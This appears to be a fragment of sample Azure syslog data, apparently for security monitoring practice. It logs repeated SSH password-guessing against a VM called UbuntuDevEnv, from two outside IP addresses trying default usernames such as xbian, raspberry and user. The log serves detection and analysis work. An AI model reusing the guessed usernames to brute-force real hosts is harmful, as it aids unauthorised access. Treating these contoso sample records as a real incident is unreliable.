+12486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:45,UbuntuDevEnv,2019-06-26 03:41:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:47,UbuntuDevEnv,2019-06-26 03:41:46,auth,UbuntuDevEnv,info,Failed password for invalid user xbian from 45.122.222.193 port 59931 ssh2,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,59931,,
+12488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:47,UbuntuDevEnv,2019-06-26 03:41:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:49,UbuntuDevEnv,2019-06-26 03:41:48,auth,UbuntuDevEnv,info,Failed password for invalid user xbian from 45.122.222.193 port 59931 ssh2,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,59931,,
+12490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:49,UbuntuDevEnv,2019-06-26 03:41:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:51,UbuntuDevEnv,2019-06-26 03:41:50,auth,UbuntuDevEnv,info,Failed password for invalid user xbian from 45.122.222.193 port 59931 ssh2,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,59931,,
+12492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:51,UbuntuDevEnv,2019-06-26 03:41:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:53,UbuntuDevEnv,2019-06-26 03:41:53,auth,UbuntuDevEnv,info,Failed password for invalid user xbian from 45.122.222.193 port 59931 ssh2,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,59931,,
+12494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:54,UbuntuDevEnv,2019-06-26 03:41:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:55,UbuntuDevEnv,2019-06-26 03:41:55,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:55,UbuntuDevEnv,2019-06-26 03:41:55,auth,UbuntuDevEnv,info,Disconnecting invalid user xbian 45.122.222.193 port 59931: Too many authentication failures [preauth],116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,59931,,
+12497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:55,UbuntuDevEnv,2019-06-26 03:41:55,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user xbian from 45.122.222.193 port 59931 ssh2 [preauth],116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,59931,,
+12498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:55,UbuntuDevEnv,2019-06-26 03:41:55,auth,UbuntuDevEnv,info,Failed password for invalid user xbian from 45.122.222.193 port 59931 ssh2,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,59931,,
+12499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:41:55,UbuntuDevEnv,2019-06-26 03:41:55,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,116602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+12500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:06,UbuntuDevEnv,2019-06-26 03:42:06,auth,UbuntuDevEnv,info,Invalid user xbian from 45.122.222.193 port 33455,116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,33455,,
+12501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:06,UbuntuDevEnv,2019-06-26 03:42:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:06,UbuntuDevEnv,2019-06-26 03:42:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:08,UbuntuDevEnv,2019-06-26 03:42:08,auth,UbuntuDevEnv,info,Failed password for invalid user xbian from 45.122.222.193 port 33455 ssh2,116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,33455,,
+12504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:09,UbuntuDevEnv,2019-06-26 03:42:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:11,UbuntuDevEnv,2019-06-26 03:42:10,auth,UbuntuDevEnv,info,Failed password for invalid user xbian from 45.122.222.193 port 33455 ssh2,116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,33455,,
+12506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:11,UbuntuDevEnv,2019-06-26 03:42:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:12,UbuntuDevEnv,2019-06-26 03:42:12,auth,UbuntuDevEnv,info,Failed password for invalid user xbian from 45.122.222.193 port 33455 ssh2,116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,33455,,
+12508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:13,UbuntuDevEnv,2019-06-26 03:42:12,auth,UbuntuDevEnv,info,Received disconnect from 45.122.222.193 port 33455:11: Bye Bye [preauth],116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,33455,,
+12509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:13,UbuntuDevEnv,2019-06-26 03:42:12,auth,UbuntuDevEnv,info,Disconnected from invalid user xbian 45.122.222.193 port 33455 [preauth],116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xbian,45.122.222.1,33455,,
+12510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:13,UbuntuDevEnv,2019-06-26 03:42:12,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:14,UbuntuDevEnv,2019-06-26 03:42:14,auth,UbuntuDevEnv,info,Invalid user user from 45.122.222.193 port 34205,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,34205,,
+12512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:15,UbuntuDevEnv,2019-06-26 03:42:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:15,UbuntuDevEnv,2019-06-26 03:42:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:17,UbuntuDevEnv,2019-06-26 03:42:17,auth,UbuntuDevEnv,info,Failed password for invalid user user from 45.122.222.193 port 34205 ssh2,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,34205,,
+12515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:17,UbuntuDevEnv,2019-06-26 03:42:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:19,UbuntuDevEnv,2019-06-26 03:42:18,auth,UbuntuDevEnv,info,Failed password for invalid user user from 45.122.222.193 port 34205 ssh2,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,34205,,
+12517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:20,UbuntuDevEnv,2019-06-26 03:42:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:21,UbuntuDevEnv,2019-06-26 03:42:21,auth,UbuntuDevEnv,info,Failed password for invalid user user from 45.122.222.193 port 34205 ssh2,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,34205,,
+12519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:22,UbuntuDevEnv,2019-06-26 03:42:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:23,UbuntuDevEnv,2019-06-26 03:42:23,auth,UbuntuDevEnv,info,Failed password for invalid user user from 45.122.222.193 port 34205 ssh2,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,34205,,
+12521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:24,UbuntuDevEnv,2019-06-26 03:42:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:25,UbuntuDevEnv,2019-06-26 03:42:25,auth,UbuntuDevEnv,info,Failed password for invalid user user from 45.122.222.193 port 34205 ssh2,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,34205,,
+12523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:25,UbuntuDevEnv,2019-06-26 03:42:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:28,UbuntuDevEnv,2019-06-26 03:42:27,auth,UbuntuDevEnv,info,Disconnecting invalid user user 45.122.222.193 port 34205: Too many authentication failures [preauth],116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,34205,,
+12525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:28,UbuntuDevEnv,2019-06-26 03:42:27,auth,UbuntuDevEnv,info,Failed password for invalid user user from 45.122.222.193 port 34205 ssh2,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,34205,,
+12526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:28,UbuntuDevEnv,2019-06-26 03:42:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:28,UbuntuDevEnv,2019-06-26 03:42:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user user from 45.122.222.193 port 34205 ssh2 [preauth],116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,34205,,
+12528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:28,UbuntuDevEnv,2019-06-26 03:42:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,116723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+12529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:37,UbuntuDevEnv,2019-06-26 03:42:37,auth,UbuntuDevEnv,info,Invalid user user from 45.122.222.193 port 35954,116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,35954,,
+12530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:38,UbuntuDevEnv,2019-06-26 03:42:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:38,UbuntuDevEnv,2019-06-26 03:42:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:40,UbuntuDevEnv,2019-06-26 03:42:39,auth,UbuntuDevEnv,info,Failed password for invalid user user from 45.122.222.193 port 35954 ssh2,116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,35954,,
+12533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:40,UbuntuDevEnv,2019-06-26 03:42:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:42,UbuntuDevEnv,2019-06-26 03:42:41,auth,UbuntuDevEnv,info,Failed password for invalid user user from 45.122.222.193 port 35954 ssh2,116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,35954,,
+12535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:42,UbuntuDevEnv,2019-06-26 03:42:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:44,UbuntuDevEnv,2019-06-26 03:42:43,auth,UbuntuDevEnv,info,Failed password for invalid user user from 45.122.222.193 port 35954 ssh2,116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,35954,,
+12537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:44,UbuntuDevEnv,2019-06-26 03:42:43,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:44,UbuntuDevEnv,2019-06-26 03:42:43,auth,UbuntuDevEnv,info,Received disconnect from 45.122.222.193 port 35954:11: Bye Bye [preauth],116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.122.222.1,35954,,
+12539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:44,UbuntuDevEnv,2019-06-26 03:42:43,auth,UbuntuDevEnv,info,Disconnected from invalid user user 45.122.222.193 port 35954 [preauth],116797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,45.122.222.1,35954,,
+12540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:46,UbuntuDevEnv,2019-06-26 03:42:46,auth,UbuntuDevEnv,info,Invalid user raspberry from 45.122.222.193 port 36564,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,36564,,
+12541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:46,UbuntuDevEnv,2019-06-26 03:42:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:46,UbuntuDevEnv,2019-06-26 03:42:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.122.222.193,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.122.222.1,,0,
+12543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:48,UbuntuDevEnv,2019-06-26 03:42:47,auth,UbuntuDevEnv,info,Failed password for invalid user raspberry from 45.122.222.193 port 36564 ssh2,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,45.122.222.1,36564,,
+12544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:48,UbuntuDevEnv,2019-06-26 03:42:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,116830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:50,UbuntuDevEnv,2019-06-26 03:42:49,auth,UbuntuDevEnv,info,Invalid user mc from 118.24.131.236 port 35134,116843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,118.24.131.2,35134,,
+12546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:42:50,UbuntuDevEnv,2019-06-26 03:42:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,116843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
